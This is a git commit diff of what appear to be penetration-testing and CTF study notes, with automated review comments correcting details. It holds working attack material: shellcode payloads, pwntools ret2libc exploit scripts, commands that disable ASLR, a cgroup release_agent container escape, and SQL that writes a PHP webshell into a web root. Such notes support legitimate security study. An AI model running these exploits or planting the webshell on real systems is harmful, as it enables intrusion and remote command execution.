whackx 2023-05-03 23:20:31 +02:00
parent 4fde0d92da
commit b15d5ea2ba
5 changed files with 136 additions and 28 deletions

View File

@ -11,7 +11,9 @@ python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\
``` ```
## Finding Offset ## Finding Offset
### via gdb segfault output ### via gdb segfault output
* 64 bit addresses use 6 out of 8 byte for addresses. * 64 bit addresses use 6 out of 8 byte for addresses.
```sh ```sh
gdb ./application gdb ./application
@ -41,6 +43,7 @@ pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
``` ```
## Crafting Payload ## Crafting Payload
* Contains Junk/NOPslice + shellcode + Junk over rbp + return address * Contains Junk/NOPslice + shellcode + Junk over rbp + return address
* Inside gdb * Inside gdb
```sh ```sh
@ -62,7 +65,9 @@ run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
[...] [...]
``` ```
* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`. * Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
## NopSled ## NopSled
* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`. * Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
```sh ```sh
(gdb) x/100x $rsp-200 (gdb) x/100x $rsp-200

View File

@ -7,6 +7,7 @@
## Example ## Example
### Example 1
```python ```python
from pwn import * from pwn import *
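Review bot: the new `### Example 1` heading is added under a singular `## Example`; once the examples are numbered the parent should read `## Examples`, which is what this same commit does in the ret2libc file (`## Example without ASLR` becomes `## Examples` with `### Example …` children). Rename the parent here too so the two files follow one convention.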

View File

@ -0,0 +1,41 @@
# Tips & Tricks for Binary Exploitations
# Toggle ASLR
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
* Take a look of the current stay via
```sh
sysctl kernel.randomize_va_space
```
Disable ASLR temporarily via
```sh
echo 0 | sudo tee /proc/sys/kernel.randomize_va_space
```
Disable it permanently via
```sh
echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf
```
## Keep stdin open
Sometimes input of payloads via stdin pipes cannot be done directly.
If you call an interactive shell in the exploited binary it may not stay open if you pipe the payload as is.
Therefore, the payload should be piped in the following way
```sh
(echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBu\x06' ; cat ) | ./binary
```
Therein, it is important to use the parameters `-e` and -- depending on the binary `-n` -- for the input being interpeted raw and not as ascii values.
Debug the input via `xxd`
```sh
echo -e '\xde\xad\xc0\xde' | xxd
```
## NULL bytes in Adresses
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
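Review bot: `echo 0 | sudo tee /proc/sys/kernel.randomize_va_space` targets a path that does not exist; the procfs file is `/proc/sys/kernel/randomize_va_space` (slash, not dot; the dotted form is the sysctl key used in the `sysctl kernel.randomize_va_space` line above), so either fix the path or use `sudo sysctl -w kernel.randomize_va_space=0`. The permanent variant `echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf` needs root for the redirection (the caller's shell opens the file, so prefixing `sudo` to `echo` would not help; use `sudo tee`), and the file is only read at boot or after `sudo sysctl --system`, which the text should say. In the stdin section the description of `-e` is backwards: `-e` makes `echo` interpret backslash escapes, so `\x06` is emitted as the single byte 0x06 instead of the four characters `\`, `x`, `0`, `6`, and `-n` suppresses the trailing newline that would otherwise become part of the payload; also note that `echo -e` is not POSIX (dash's builtin prints `-e` literally), so `printf` is the portable form. The NULL-byte rule is stated too broadly: a `\x00` only truncates input that passes through a C string routine such as `strcpy`, `strcat` or `sprintf`; `read()`, `fread()`, `gets()` and `fgets()` all copy NUL bytes through, so list those rather than `read()` alone (a canonical 64-bit user address like `0x00007fffffffe2a8` carries two zero high bytes, which matters only when the overflow goes through one of those string routines and more data must follow the address). Typos: `# Toggle ASLR` should be `## Toggle ASLR` like the other sections, "current stay" should be "current state", and "interpeted" should be "interpreted".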

View File

@ -23,15 +23,28 @@
```sh ```sh
info sharedlibrary info sharedlibrary
``` ```
or statically via ldd
```sh
ldd ./<binary>
```
### Find offsets to gadgets in libc
### Manually
* On target find `sh` address inside libc * On target find `sh` address inside libc
```sh ```sh
strings -a -t x /lib32/libc.so.6 | grep /bin/sh strings -a -t x /lib32/libc.so.6 | grep /bin/sh
``` ```
* Sub from `system` address from inside libc * Sub from `system` address from inside libc
```sh ```sh
readelf -s /lib32/libc.so.6 | grep system readelf -s /lib32/libc.so.6 | grep system | awk '{print $2}'
```
* Pwntools can be used as well
```sh
libc = elf.libc
libc.address = 0x7ff83d8d000
system = libc.sym['system']
bin_sh = next(libc.search(b'/bin/sh'))
``` ```
### Measure the Buffer ### Measure the Buffer
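Review bot: `ldd ./<binary>` is not a static check: `ldd` drives the dynamic loader, and the ldd man page warns that in some configurations this executes code from the target binary, so on an untrusted sample use `readelf -d ./<binary> | grep NEEDED` or `objdump -p` instead; the addresses `ldd` prints are also per-run values under ASLR, only the library paths are useful. In `readelf -s /lib32/libc.so.6 | grep system | awk '{print $2}'` the grep also matches `__libc_system`, `svcerr_systemerr` and similar symbols, so the awk prints several values with no name to tell them apart; `grep -w system` keeps only the `system@@GLIBC_…` line. The pwntools snippet is fenced as ` ```sh ` but is Python, and `libc.address = 0x7ff83d8d000` has 11 hex digits where a 64-bit libc base has 12 (for example `0x7ffff7d8d000`); a digit looks dropped, so either fix the literal or write `<leaked base>`. `elf.libc` resolves to the libc that the local loader reports for the binary, so add that against a remote target the target's own libc must be loaded with `ELF('<path>')`. Finally `### Manually` is a child of `### Find offsets to gadgets in libc` but sits at the same level; make it `####` or raise the parent to `##`.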
@ -62,7 +75,10 @@ objdump -d <file> | grep ret
* [xct's ropstar](https://github.com/xct/ropstar.git) * [xct's ropstar](https://github.com/xct/ropstar.git)
## Example without ASLR ## Examples
### Example without ASLR
```python ```python
from pwn import * from pwn import *
@ -76,18 +92,18 @@ rop_ret = <found rop ret>
payload = b'A' * <count> payload = b'A' * <count>
payload += b'B' * 8 payload += b'B' * 8
payload += p64(rop_ret)
payload += p64(rop_rdi) payload += p64(rop_rdi)
payload += p64(sh) payload += p64(sh)
payload += p64(0x0) # maybe rop_ret
payload += p64(system) payload += p64(system)
payload += p64(0x0) # end payload
p.recv() p.recv()
p.sendline(payload) p.sendline(payload)
p.interactive() p.interactive()
``` ```
## Example with ASLR ### Example with ASLR
* Create context * Create context
```python ```python
#!/usr/bin/env python3 #!/usr/bin/env python3
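Review bot: `payload += p64(0x0) # maybe rop_ret` between `p64(sh)` and `p64(system)` breaks the chain: `pop rdi; ret` pops `sh` into rdi and its `ret` then pops the next qword as the return target, so that slot must hold `system` (or a `ret` gadget), never a literal 0; as written the process jumps to address 0 and crashes before `system` runs. Alignment padding belongs where the new `payload += p64(rop_ret)` before `rop_rdi` already puts it, or as a `ret` gadget in the slot after `sh`, but only one of the two: each extra `ret` moves rsp by 8, so using both undoes the 16-byte realignment again (the misalignment symptom is a SIGSEGV on a `movaps` inside `system`/`do_system`). The closing `p64(0x0) # end payload` is acceptable as a crash-on-exit return address, though `exit` from libc gives a clean exit; in any case replace `# maybe rop_ret` with a comment that says what the slot actually is.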
@ -100,7 +116,7 @@ rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = process() p = process()
# ROP I, needed when ASL is enabled # ROP I, needed when ASLR is enabled
payload = b'A' * 18 payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0]) payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(elf.got.gets) payload += p64(elf.got.gets)
@ -128,3 +144,46 @@ p.sendline(payload)
p.recvline() p.recvline()
p.interactive() p.interactive()
``` ```
### Example: exploit_me
This is taken from [shoulderhu's gitbook](https://github.com/shoulderhu/gitbook-tryhackme/blob/master/walkthroughs/medium/ret2libc.md)
The libc base is found through a delta of the leaked value and libc gets symbol offset.
```python
from pwn import *
context.binary = binary = './exploit_me'
elf = ELF(binary)
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
padding = b'A' * 18
payload = padding
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(elf.got.gets)
payload += p64(elf.plt.puts)
payload += p64(elf.symbols.main)
p = process()
p.recvline()
p.sendline(payload)
p.recvline()
leak = u64(p.recvline().strip().ljust(8, b'\0'))
p.recvline()
log.info(f'Gets leak => {hex(leak)}')
libc.address = leak - libc.symbols.gets
log.info(f'Libc base => {hex(libc.address)}')
payload = padding
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(rop.find_gadget(['ret'])[0])
payload += p64(libc.symbols.system)
p.sendline(payload)
p.recvline()
p.interactive()
```
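Review bot: `leak = u64(p.recvline().strip().ljust(8, b'\0'))` can corrupt the leak: `bytes.strip()` removes every ASCII whitespace byte at either end, so a leaked `gets` address whose low byte happens to be 0x20, 0x09, 0x0a or 0x0d loses that byte and `libc.address` comes out wrong; use `p.recvline()[:-1]` or `.rstrip(b'\n')` to drop only the newline that `puts` appends. The script also hardcodes `/lib/x86_64-linux-gnu/libc.so.6`, which is only right for a local `process()`; against a remote host the leak must be combined with the target's libc (its `gets` offset fixes the base), and the sentence above the block should say so. Smaller points: `context.binary = binary = './exploit_me'` followed by `elf = ELF(binary)` parses the binary twice, `elf = context.binary = ELF('./exploit_me')` does it once; and the `p64(rop.find_gadget(['ret'])[0])` before `system` is the correct alignment fix and deserves a comment, since the no-ASLR example earlier in this file puts a literal 0 in that position.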

View File

@ -1,5 +1,22 @@
# Docker Vulnerabilities # Docker Vulnerabilities
## Check if you are inside a container
* Low process count
```sh
ps aux
```
* `.dockerenv` in `/`
```sh
cd / && ls -lah
```
* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```
* [Container enumeration](https://github.com/stealthcopter/deepce) * [Container enumeration](https://github.com/stealthcopter/deepce)
## Abusing Registry ## Abusing Registry
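Review bot: `pwd /proc/1` followed by `cat cgroups` does not perform the check the bullet describes: `pwd` takes no path operand (it prints the current directory and ignores or warns about the argument), and the file is `cgroup`, not `cgroups`, so the intended command is `cat /proc/1/cgroup`. The three checks should also be labelled as heuristics: `/.dockerenv` is Docker-specific and absent under containerd, CRI-O or podman; on a cgroup v2 host with cgroup namespaces `/proc/1/cgroup` shows only `0::/` inside the container, so no `docker` name appears; and a short `ps aux` listing is just as true of a minimal VM. The deepce link below already combines more signals and can be pointed to for that. This block is the same text that the last hunk removes from the end of the file (a move), so the fix belongs here.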
@ -49,7 +66,7 @@ dive <IMAGE-ID>
## Escape Container via Exposed Docker Daemon ## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets * Looking for exposed docker sockets
```sh ```sh
find / -name "*sock" find / -name "*sock" 2>/dev/null
groups groups
``` ```
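Review bot: `find / -name "*sock" 2>/dev/null` matches on the file name only, so it finds `docker.sock` but misses Unix sockets named differently (for example `/run/dbus/system_bus_socket`); `find / -type s 2>/dev/null` lists sockets by file type regardless of name. For the Docker case the direct check is more useful than a search: `ls -la /var/run/docker.sock` shows whether the socket exists and who owns it, and `curl --unix-socket /var/run/docker.sock http://localhost/version` shows whether the current user can actually talk to the daemon. `groups` on its own only lists the caller's groups; the relevant comparison is with the socket's group (normally `docker`) or a world-writable mode, so suggest `stat -c '%U:%G %a' /var/run/docker.sock` next to it.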
@ -97,6 +114,7 @@ chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
``` ```
* The file may appear outside the container on the host system * The file may appear outside the container on the host system
## Check fdisk ## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed * `fdisk -l` and `lsblk`, host bulk device may be exposed
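Review bot: "The file may appear outside the container on the host system" is ambiguous: name the file (the output written by the script that the kernel runs as `release_agent`) and say why it lands on the host: the kernel executes `release_agent` in the initial mount namespace, so any path in the script resolves against the host filesystem, which is why the usual form of this trick writes to the container's overlay upperdir path taken from `/etc/mtab` so the result is visible inside the container as well. The section should also state the preconditions the `sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"` trigger relies on: a writable cgroup v1 mount, which needs `--privileged` or `CAP_SYS_ADMIN` without the default AppArmor/seccomp profile, and cgroup v1 only, since cgroup v2 has no `release_agent` file.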
@ -144,12 +162,13 @@ Upgrade: tcp
* Login into DB * Login into DB
* Create table * Create table
* Inject PHP code * Inject PHP code
* Select table content intoa file the user can read * Select table content into a file the user can read
* Execute the file * Execute the file
```sql ```sql
create table h4x0r (pwn varchar(1024)); create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET[“cmd”];system($cmd);?>'); insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php'; select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
``` ```
* curl the webshell hon the exploited host * curl the webshell hon the exploited host
```sh ```sh
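Review bot: `select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php'` still writes the literal string, once per row of `h4x0r`, so the `insert` above is never used; either `select pwn from h4x0r into outfile '/var/www/html/shell.php'` (which matches the bullet "Select table content into a file") or drop the table and insert steps and keep only the select. `INTO OUTFILE` also needs the `FILE` privilege, a target directory permitted by `secure_file_priv` (`NULL` disables it entirely), and the file is written as the mysqld OS user, which are the usual reasons this step fails, so they deserve a line. On the PostgreSQL line, `#` is not a comment marker in PostgreSQL (`--` is) and is parsed as an operator, so the line errors as written; `COPY (…) TO 'file'` additionally requires superuser or the `pg_write_server_files` role. Since the block is fenced `sql` but mixes MySQL and PostgreSQL syntax, label each dialect, and fix "PostreSQL" to "PostgreSQL". Unchanged context line below: "curl the webshell hon the exploited host" should read "on the exploited host".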
@ -166,20 +185,3 @@ https://github.com/dirtycow/dirtycow.github.io
* Least Privileges * Least Privileges
* Seccomp * Seccomp
* Securing Registry via TLS * Securing Registry via TLS
## Checking if you are inside a container
* Low process count
```sh
ps aux
```
* `.dockerenv` in `/`
```sh
cd / && ls -lah
```
* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```
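Review bot: this removal is the counterpart of the block added at the top of the file (a move, not a deletion), so no objection to the hunk itself, but the moved text carries the non-working `pwd /proc/1` and `cat cgroups` commands with it; the intended command is `cat /proc/1/cgroup`, and it should be corrected in the new location.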